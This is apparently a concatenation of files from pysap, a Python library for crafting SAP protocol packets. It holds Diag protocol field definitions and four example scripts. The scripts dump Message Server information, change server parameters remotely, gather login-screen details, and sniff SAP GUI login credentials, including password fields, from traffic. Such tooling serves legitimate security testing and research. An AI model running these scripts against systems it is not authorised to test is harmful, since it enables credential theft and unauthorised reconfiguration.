        ByteEnumKeysField("etype", 0, diag_atom_etypes),
        ByteField("area", 0),
        ByteField("block", 0),
        ByteField("group", 0),
        ShortField("row", 0),
        ShortField("col", 0),
        # Attr flags
        BitField("attr_DIAG_BSD_COMBOSTYLE", 0, 1),  # 80
        BitField("attr_DIAG_BSD_YES3D", 0, 1),       # 40
        BitField("attr_DIAG_BSD_PROPFONT", 0, 1),    # 20
        BitField("attr_DIAG_BSD_MATCHCODE", 0, 1),   # 10
        BitField("attr_DIAG_BSD_JUSTRIGHT", 0, 1),   # 08
        BitField("attr_DIAG_BSD_INTENSIFY", 0, 1),   # 04
        BitField("attr_DIAG_BSD_INVISIBLE", 0, 1),   # 02
        BitField("attr_DIAG_BSD_PROTECTED", 0, 1),   # 01

        # DIAG_DGOTYP_FNAME
        ConditionalField(StrLenField("name_text", "", length_from=lambda pkt:pkt.atom_length - 13), lambda pkt:pkt.etype == 114),
        # DIAG_DGOTYP_PUSHBUTTON_2 */
        ConditionalField(ByteField("pushbutton_v_length", 0), lambda pkt:pkt.etype in [115]),
        ConditionalField(ByteField("pushbutton_v_height", 0), lambda pkt:pkt.etype in [115]),
        ConditionalField(ShortField("pushbutton_function_code_offset", 0), lambda pkt:pkt.etype in [115]),
        ConditionalField(ShortField("pushbutton_text_offset", 0), lambda pkt:pkt.etype in [115]),
        ConditionalField(StrField("pushbutton_text", ""), lambda pkt:pkt.etype in [115]),
        ConditionalField(StrField("pushbutton_function_code", ""), lambda pkt:pkt.etype in [115]),
        # DIAG_DGOTYP_TABSTRIP_BUTTON
        ConditionalField(ByteField("tabstripbutton_v_length", 0), lambda pkt:pkt.etype in [116]),
        ConditionalField(ByteField("tabstripbutton_v_height", 0), lambda pkt:pkt.etype in [116]),
        ConditionalField(ByteField("tabstripbutton_page_id", 0), lambda pkt:pkt.etype in [116]),
        ConditionalField(ShortField("tabstripbutton_function_code_offset", 0), lambda pkt:pkt.etype in [116]),
        ConditionalField(ShortField("tabstripbutton_text_offset", 0), lambda pkt:pkt.etype in [116]),
        ConditionalField(ShortField("tabstripbutton_id_offset", 0), lambda pkt:pkt.etype in [116]),
        ConditionalField(StrNullField("tabstripbutton_text", ""), lambda pkt:pkt.etype in [116]),
        ConditionalField(StrNullField("tabstripbutton_function_code", ""), lambda pkt:pkt.etype in [116]),
        ConditionalField(StrNullField("tabstripbutton_id", ""), lambda pkt:pkt.etype in [116]),
        # DIAG_DGOTYP_XMLPROP
        ConditionalField(StrLenField("xmlprop_text", "", length_from=lambda pkt:pkt.atom_length - 13), lambda pkt:pkt.etype == 120),
        # DIAG_DGOTYP_EFIELD_1 or DIAG_DGOTYP_OFIELD_1 or DIAG_DGOTYP_KEYWORD_1
        ConditionalField(ByteField("field1_flag1", 0), lambda pkt:pkt.etype in [121, 122, 123]),
        ConditionalField(FieldLenField("field1_dlen", None, fmt="B", length_of="field1_text"), lambda pkt:pkt.etype in [121, 122, 123]),
        ConditionalField(ByteField("field1_mlen", 0), lambda pkt:pkt.etype in [121, 122, 123]),
        ConditionalField(ShortField("field1_maxnrchars", 0), lambda pkt:pkt.etype in [121, 122, 123]),
        ConditionalField(StrLenField("field1_text", "", length_from=lambda pkt:pkt.field1_dlen), lambda pkt:pkt.etype in [121, 122, 123]),
        # DIAG_DGOTYP_FRAME_1
        ConditionalField(ShortField("frame_drows", 0), lambda pkt:pkt.etype in [127]),
        ConditionalField(ShortField("frame_dcols", 0), lambda pkt:pkt.etype in [127]),
        ConditionalField(StrLenField("frame_text", "", length_from=lambda pkt:pkt.atom_length - 17), lambda pkt:pkt.etype in [127]),
        # DIAG_DGOTYP_RADIOBUTTON_3
        ConditionalField(ByteField("radiobutton_button", 0), lambda pkt:pkt.etype in [129]),
        ConditionalField(ShortField("radiobutton_visible_label_length", 0), lambda pkt:pkt.etype in [129]),
        ConditionalField(ShortField("radiobutton_event_id_off", 0), lambda pkt:pkt.etype in [129]),
        ConditionalField(ByteField("radiobutton_event_id_len", 0), lambda pkt:pkt.etype in [129]),
        ConditionalField(ShortField("radiobutton_text_off", 0), lambda pkt:pkt.etype in [129]),
        ConditionalField(ShortField("radiobutton_text_length", 0), lambda pkt:pkt.etype in [129]),
        ConditionalField(StrLenField("radiobutton_text", "", length_from=lambda pkt:pkt.radiobutton_event_id_len + pkt.radiobutton_text_length), lambda pkt:pkt.etype in [129]),
        # DIAG_DGOTYP_EFIELD_2 or DIAG_DGOTYP_OFIELD_2 or DIAG_DGOTYP_KEYWORD_2
        ConditionalField(ShortField("field2_flag1", 0), lambda pkt:pkt.etype in [130, 131, 132]),
        ConditionalField(FieldLenField("field2_dlen", None, fmt="B", length_of="field2_text"), lambda pkt:pkt.etype in [130, 131, 132]),
        ConditionalField(ByteField("field2_mlen", 0), lambda pkt:pkt.etype in [130, 131, 132]),
        ConditionalField(ShortField("field2_maxnrchars", 0), lambda pkt:pkt.etype in [130, 131, 132]),
        ConditionalField(StrLenField("field2_text", "", length_from=lambda pkt:pkt.field2_dlen), lambda pkt:pkt.etype in [130, 131, 132]),
        # Remaining types
        ConditionalField(StrLenField("value", "", length_from=lambda pkt:pkt.atom_length - 13), lambda pkt:pkt.etype not in [114, 115, 116, 120, 121, 122, 123, 127, 129, 130, 131, 132]),
    ]

    def post_build(self, p, pay):
        if pay is None:
            pay = ''
        # Update the atom_length field (first 2 bytes) with the packet length
        p = pack("!H", len(p)) + p[2:]
        return p + pay


# Diag Dynt Atom container
class SAPDiagDyntAtom(Packet):
    name = "SAP Diag Dynt Atom"
    fields_desc = [
        PacketListField("items", None, SAPDiagDyntAtomItem)
    ]

bind_diagitem(SAPDiagDyntAtom, "APPL", 0x09, 0x02)
bind_diagitem(SAPDiagDyntAtom, "APPL", 0x09, 0x10)


# Diag Area Size
class SAPDiagAreaSize(PacketNoPadded):
    name = "SAP Diag Area Size"
    fields_desc = [
        IntField("window_height", 0),
        IntField("window_width", 0),
        IntField("area_height", 0),
        IntField("area_width", 0)
    ]

bind_diagitem(SAPDiagAreaSize, "APPL", 0x0c, 0x07)


# Diag Window Size
class SAPDiagWindowSize(PacketNoPadded):
    name = "SAP Diag Window Size"
    fields_desc = [
        IntField("window_height", 0),
        IntField("window_width", 0),
        IntField("area_height", 0),
        IntField("area_width", 0)
    ]


bind_diagitem(SAPDiagWindowSize, "APPL", 0x04, 0x0d)


# Diag Menu Entry
class SAPDiagMenuEntry(PacketNoPadded):
    name = "SAP Diag Menu Entry"
    fields_desc = [
        ShortField("length", 0),
        ByteField("position_1", 0),
        ByteField("position_2", 0),
        ByteField("position_3", 0),
        ByteField("position_4", 0),
        # Menu Entry Flags
        BitField("flag_TERM_??8", 0, 1),  # 80
        BitField("flag_TERM_??7", 0, 1),  # 40
        BitField("flag_TERM_??6", 0, 1),  # 20
        BitField("flag_TERM_VKEY", 0, 1),  # 10
        BitField("flag_TERM_SEP", 0, 1),  # 8
        BitField("flag_TERM_MEN", 0, 1),  # 4
        BitField("flag_TERM_SEL", 0, 1),  # 2
        BitField("flag_TERM_??1", 0, 1),  # 1
        ByteField("virtual_key", 0),
        ByteField("return_code_1", 0),
        ByteField("return_code_2", 0),
        ByteField("return_code_3", 0),
        ByteField("return_code_4", 0),
        ByteField("return_code_5", 0),
        ByteField("return_code_6", 0),
        ByteField("function_code_1", 0),
        ByteField("function_code_2", 0),
        ByteField("function_code_3", 0),
        ByteField("function_code_4", 0),
        ByteField("function_code_5", 0),
        ByteField("function_code_6", 0),
        StrNullField("text", ""),
        StrNullField("accelerator", ""),
        StrNullField("info", ""),
    ]


# Diag Menu Entries Container
class SAPDiagMenuEntries(Packet):
    name = "SAP Diag Menu Entries"
    fields_desc = [
        PacketListField("entries", None, SAPDiagMenuEntry)
    ]

bind_diagitem(SAPDiagMenuEntries, "APPL", 0x0b, 0x01)
bind_diagitem(SAPDiagMenuEntries, "APPL", 0x0b, 0x02)
bind_diagitem(SAPDiagMenuEntries, "APPL", 0x0b, 0x03)
bind_diagitem(SAPDiagMenuEntries, "APPL", 0x0b, 0x04)


# Diag UI Event Type values
diag_ui_event_type_values = {
    0x01: "SELECT",
    0x02: "HE",
    0x03: "VALUEHELP",
    0x06: "RESIZE",
    0x07: "FUNCTIONKEY",
    0x08: "SCROLL",
    0x09: "BUTTONPRESSED",
    0x0a: "VALUECHANGED",
    0x0b: "STATECHANGED",
    0x0c: "NAVIGATION",
}
"""Diag UI Event Type values"""

# Diag UI Event Control Type values
diag_ui_event_control_values = {
    0x00: "NONE",
    0x01: "FIELD",
    0x02: "RADIOBUTTON",
    0x03: "CHECKBUTTON",
    0x04: "MENUBUTTON",
    0x05: "TOOLBARBUTTON",
    0x06: "STANDARDTOOLBARBUTTON",
    0x07: "PUSHBUTTON",
    0x08: "TABLEVIEW",
    0x09: "TABSTRIP",
    0x0a: "DYNPRO",
    0x0b: "CUSTOM_CONTROL",
    0x0d: "FRAME",
    0x0e: "TABLEVIEW_COLSEL_BUTTON",
    0x0f: "TABLEVIEW_ROWSEL_BUTTON",
    0x10: "TABLEVIEW_CELL",
    0x11: "CONTEXTMENU",
    0x12: "SPLITTER",
    0x13: "MESSAGE",
    0x14: "OKCODE",
    0x15: "ACC_CONTAINER",
}
"""Diag UI Event Control Type values"""

# Diag UI Event Navigation Data values
diag_ui_event_navigation_data_values = {
    0x01: "TAB",
    0x02: "TAB_BACK",
    0x03: "JUMP_OVER",
    0x04: "JUMP_OVER_BACK",
    0x05: "JUMP_OUT",
    0x06: "JUMP_OUT_BACK",
    0x07: "JUMP_SECTION",
    0x08: "JUMP_SECTION_BACK",
    0x09: "FIRST_FIELD",
    0x0a: "LAST_FIELD",
}
"""Diag UI Event Navigation Data values"""


# Diag UI Event Source
class SAPDiagUIEventSource(PacketNoPadded):
    name = "UI Event Source"
    fields_desc = [
        BitField("valid_unused", 0, 4),
        BitField("valid_functionkey_data", 0, 1),
        BitField("valid_navigation_data", 0, 1),
        BitField("valid_control_pos", 0, 1),
        BitField("valid_menu_pos", 0, 1),
        ShortEnumKeysField("event_type", 0, diag_ui_event_type_values),
        ShortEnumKeysField("control_type", 0, diag_ui_event_control_values),
        ConditionalField(ByteEnumKeysField("navigation_data", 0, diag_ui_event_navigation_data_values), lambda pkt:pkt.valid_navigation_data),
        ConditionalField(ByteField("event_data", 0), lambda pkt:not pkt.valid_navigation_data),
        ShortField("control_row", 0),
        ShortField("control_col", 0),
        FieldLenField("container_nrs", None, count_of="containers"),
        FieldListField("containers", None, ByteField("container", 0), count_from=lambda x:x.container_nrs)
    ]


bind_diagitem(SAPDiagUIEventSource, "APPL", 0x0f, 0x01)


# Diag SES
class SAPDiagSES(PacketNoPadded):
    name = "SES"
    fields_desc = [
        ByteField("eventarray", 0),
        ByteField("eventid1", 0),
        ByteField("eventid2", 0),
        ByteField("eventid3", 0),
        ByteField("eventid4", 0),
        ByteField("eventid5", 0),
        ByteField("screen_flag", 0),
        ByteField("modal_no", 0),
        ByteField("x_pos", 0),
        ByteField("y_pos", 0),
        ByteField("imode", 0),
        ByteField("flag_1", 0),
        ShortField("padd", 0),
        ByteField("dim_row", 0),
        ByteField("dim_col", 0)
    ]

bind_diagitem(SAPDiagSES, 0x01)



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
# Custom imports
import pysap
from pysap.SAPRouter import SAPRoutedStreamSocket
from pysap.SAPMS import SAPMS, ms_dump_command_values, ms_opcode_error_values


# Set the verbosity to 0
conf.verb = 0


# Command line options parser
def parse_options():

    description = \
    """This example script gather information provided by a SAP Netweaver
    Application Server with the Message Server protocol using the Dump
    command. Execution of the dump commands require accessing the internal
    Message Server port.
    """

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host", help="Remote host")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", help="Remote port [%default]", default=3900)
    target.add_option("--route-string", dest="route_string", help="Route string for connecting through a SAP Router")
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-c", "--client", dest="client", default="pysap's-dumper", help="Client name [%default]")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output [%default]")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.remote_host:
        parser.error("Remote host is required")

    return options


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    # Initiate the connection
    conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host,
                                              options.remote_port,
                                              options.route_string,
                                              base_cls=SAPMS)
    print("[*] Connected to the message server %s:%d" % (options.remote_host, options.remote_port))

    client_string = options.client

    # Send MS_LOGIN_2 packet
    p = SAPMS(flag=0x00, iflag=0x08, toname=client_string, fromname=client_string)

    print("[*] Sending login packet:")
    response = conn.sr(p)[SAPMS]

    print("[*] Login OK, Server string: %s" % response.fromname)
    server_string = response.fromname

    # Send a Dump Info packet for each possible Dump
    for i in ms_dump_command_values.keys():

        # Skip MS_DUMP_MSADM and MS_DUMP_COUNTER commands as the info
        # is included in other dump commands
        if i in [1, 12]:
            continue

        p = SAPMS(flag=0x02, iflag=0x01, toname=server_string,
                  fromname=client_string, opcode=0x1e, dump_dest=0x02,
                  dump_command=i)

        print("[*] Sending dump info", ms_dump_command_values[i])
        response = conn.sr(p)[SAPMS]

        if (response.opcode_error != 0):
            print("Error:", ms_opcode_error_values[response.opcode_error])
        print(response.opcode_value)


if __name__ == "__main__":
    main()



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
# Custom imports
import pysap
from pysap.SAPMS import SAPMS, SAPMSAdmRecord
from pysap.SAPRouter import SAPRoutedStreamSocket


# Set the verbosity to 0
conf.verb = 0


# Command line options parser
def parse_options():

    description = \
    """This example script changes a parameter using Message Server
    Administration requests. In order to be able to change a parameter the
    Message Server should be configured in monitoring mode (ms/monitor=1)[1]
    and the internal port should be reachable. Keep in mind that some of the
    parameters are not dynamic and can't be changed using this method.

    If the parameter value is not specified, the script retrieve the current
    value.

    [1] http://help.sap.com/saphelp_nw70/helpdata/en/4e/cffdb69d10424e97eb1d993b1e2cfd/content.htm
    """

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host> -n <parameter name> [-l <parameter value>]"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host", help="Remote host")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", help="Remote port [%default]", default=3900)
    target.add_option("--route-string", dest="route_string", help="Route string for connecting through a SAP Router")
    parser.add_option_group(target)

    param = OptionGroup(parser, "Parameter")
    param.add_option("-n", "--parameter-name", dest="param_name", help="Parameter name")
    param.add_option("-l", "--parameter-value", dest="param_value", help="Parameter value")
    parser.add_option_group(param)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-c", "--client", dest="client", default="pysap's-paramchanger", help="Client name [%default]")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output [%default]")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.remote_host:
        parser.error("Remote host is required")
    if not options.param_name:
        parser.error("Parameter name is required")

    return options


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    # Initiate the connection
    conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host,
                                              options.remote_port,
                                              options.route_string,
                                              base_cls=SAPMS)
    print("[*] Connected to the message server %s:%d" % (options.remote_host, options.remote_port))

    client_string = options.client

    # Build MS_LOGIN_2 packet
    p = SAPMS(flag=0x00, iflag=0x08, toname=client_string, fromname=client_string)

    # Send MS_LOGIN_2 packet
    print("[*] Sending login packet")
    response = conn.sr(p)[SAPMS]

    print("[*] Login performed, server string: %s" % response.fromname)
    server_string = response.fromname

    print("[*] Retrieving current value of parameter: %s" % options.param_name)

    # Send ADM AD_PROFILE request
    adm = SAPMSAdmRecord(opcode=0x1, parameter=options.param_name)
    p = SAPMS(toname=server_string, fromname=client_string, version=4,
              flag=0x04, iflag=0x05, adm_records=[adm])

    print("[*] Sending packet")
    response = conn.sr(p)[SAPMS]

    if options.verbose:
        print("[*] Response:")
        response.show()

    param_old_value = response.adm_records[0].parameter
    print("[*] Parameter %s" % param_old_value)

    # If a parameter change was requested, send an ADM AD_SHARED_PARAMETER request
    if options.param_value:
        print("[*] Changing parameter value from: %s to: %s" % (param_old_value,
                                                                options.param_value))

        # Build the packet
        adm = SAPMSAdmRecord(opcode=0x2e,
                             parameter="%s=%s" % (options.param_name,
                                                  options.param_value))
        p = SAPMS(toname=server_string, fromname=client_string, version=4,
                  iflag=5, flag=4, adm_records=[adm])

        # Send the packet
        print("[*] Sending packet")
        response = conn.sr(p)[SAPMS]

        if options.verbose:
            print("[*] Response:")
            response.show()

        if response.adm_records[0].errorno != 0:
            print("[*] Error requesting parameter change (error number %d)" % response.adm_records[0].errorno)
        else:
            print("[*] Parameter changed for the current session !")


if __name__ == "__main__":
    main()



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
import itertools
from struct import unpack
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
from scapy.sendrecv import sniff
from scapy.layers.inet import IP, TCP
from scapy.packet import bind_layers, split_layers, Raw
# Custom imports
import pysap
from pysap.SAPNI import SAPNI
from pysap.SAPDiag import SAPDiag, SAPDiagDP
from pysap.SAPDiagItems import *


# Bind the SAPDiag layer
bind_layers(SAPNI, SAPDiag,)
bind_layers(SAPNI, SAPDiagDP,)
bind_layers(SAPDiagDP, SAPDiag,)
bind_layers(SAPDiag, SAPDiagItem,)
bind_layers(SAPDiagItem, SAPDiagItem,)
# Unbind the SAPNI layer so we can perform the reassemble
split_layers(TCP, SAPNI, dport=3200)


# Set the verbosity to 0
conf.verb = 0


class DiagParser(object):

    packets_metadata = {}

    def __init__(self, options):
        self.options = options
        self.port = options.port

    def parse_packet(self, pkt):
        if TCP in pkt and Raw in pkt:
            if self.port in [pkt[TCP].sport,
                             pkt[TCP].dport]:
                key = ["%s_%d" % (pkt[IP].src, pkt[TCP].sport),
                       "%s_%d" % (pkt[IP].dst, pkt[TCP].dport)]
                key.sort()
                key = "_".join(key)
                if key not in self.packets_metadata:
                    self.packets_metadata[key] = []
                self.packets_metadata[key].append((pkt[TCP].seq + pkt[TCP].ack,
                                                   str(pkt[Raw].load)))

    def reassemble(self):
        # Build a stream of packets for each connection
        streams = {}
        for key, value in list(self.packets_metadata.items()):
            value.sort()
            value = list(value for value, __ in itertools.groupby(value))
            streams[key] = ''
            for pkts in sorted(value):
                streams[key] += pkts[1]

        # Parse the NI packets in each stream
        packets = {}
        for key, stream in list(streams.items()):
            packets[key] = []
            while len(stream) > 0:
                length = unpack("!I", stream[:4])[0]
                packets[key].append(SAPNI(stream[:length + 4]))
                stream = stream[length + 4:]

        # Parse the input fields on each packet
        for key in list(packets.keys()):
            print("[*] Conversation between %s (%d NI packets)" % ("%s:%s and %s:%s" % tuple(key.split("_")),
                                                                   len(packets[key])))
            for packet in packets[key]:
                self.parse_fields(packet)

    def parse_fields(self, pkt):
        if SAPDiag in pkt and pkt[SAPDiag].message:
            atoms = pkt[SAPDiag].get_item(["APPL", "APPL4"], "DYNT", "DYNT_ATOM")
            # Print the Atom items information
            if len(atoms) > 0:
                print("[*] Input fields:")
                for atom in [atom for atom_item in atoms for atom in atom_item.item_value.items]:
                    if atom.etype in [121, 122, 123, 130, 131, 132]:
                        text = atom.field1_text or atom.field2_text
                        text = text.strip()
                        if atom.attr_DIAG_BSD_INVISIBLE and len(text) > 0:
                            # If the invisible flag was set, we're probably
                            # dealing with a password field
                            print("[*]\tPassword field:\t%s" % (text))
                        else:
                            print("[*]\tRegular field:\t%s" % (text))


# Command line options parser
def parse_options():

    description = \
    """This example script can be used to grab SAP GUI login credentials from
    a pcap file or by sniffing on a network interface.
    """

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] [-i <interface> | -f <pcap file>]"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-i", "--interface", dest="interface", help="Choose an interface")
    target.add_option("-f", "--file", dest="pcap", help="Parse info from a pcap file")
    target.add_option("-p", "--port", dest="port", type="int", default=3200, help="Port to use as filter [%default]")
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true",
                    default=False, help="Verbose output [%default]")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    return options


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    parser = DiagParser(options)

    if options.pcap:
        print("[*] Parsing pcap file (%s)" % options.pcap)
    else:
        print("[*] Listening on interface (%s)" % options.interface)

    try:
        sniff(iface=options.interface, offline=options.pcap, prn=parser.parse_packet, store=0)
    except KeyboardInterrupt:
        pass

    print("[*] Finished parsing/sniffing")
    parser.reassemble()


if __name__ == "__main__":
    main()



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from re import escape
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
from scapy.packet import bind_layers
# Custom imports
import pysap
from pysap.SAPNI import SAPNI
from pysap.SAPDiagItems import *
from pysap.SAPDiagClient import SAPDiagConnection
from pysap.SAPDiag import (SAPDiag, SAPDiagDP, diag_appl_ids, diag_appl_sids,
                           diag_item_types)


# Bind the SAPDiag layer
bind_layers(SAPNI, SAPDiag,)
bind_layers(SAPNI, SAPDiagDP,)
bind_layers(SAPDiagDP, SAPDiag,)
bind_layers(SAPDiag, SAPDiagItem,)
bind_layers(SAPDiagItem, SAPDiagItem,)


# Set the verbosity to 0
conf.verb = 0


# Command line options parser
def parse_options():

    description = \
    """This example script gather information provided by a SAP Netweaver
    Application Server during the login process. This information includes
    generally hostname, instance, database name, etc.
    """

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host", help="Remote host")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", help="Remote port [%default]", default=3200)
    target.add_option("--route-string", dest="route_string", help="Route string for connecting through a SAP Router")
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output [%default]")
    misc.add_option("--terminal", dest="terminal", default=None, help="Terminal name")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.remote_host:
        parser.error("Remote host is required")

    return options


def show(item):
    """
    Print the information about each item: type, ID, SID and value.

    """
    print("\tType = %s\tId = %s\tSID = %s\tValue = %s" % (diag_item_types[item.item_type],
                                                          diag_appl_ids[item.item_id],
                                                          diag_appl_sids[item.item_id][item.item_sid],
                                                          escape(str(item.item_value))))


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    # Create the connection to the SAP Netweaver server
    print("[*] Connecting to %s:%d" % (options.remote_host, options.remote_port))
    connection = SAPDiagConnection(options.remote_host, options.remote_port,
                                   init=False, terminal=options.terminal,
                                   route=options.route_string)

    # Send the initialization packet and store the response (login screen)
    login_screen = connection.init()
    # Filter the response and show the interesting info
    print("[*] Login Screen information:")
    for item in login_screen[SAPDiag].get_item(["APPL", "APPL4"],
                                               ["ST_R3INFO", "ST_USER", "VARINFO"]):
        show(item)

    # Close the connection
    connection.close()


if __name__ == "__main__":
    main()
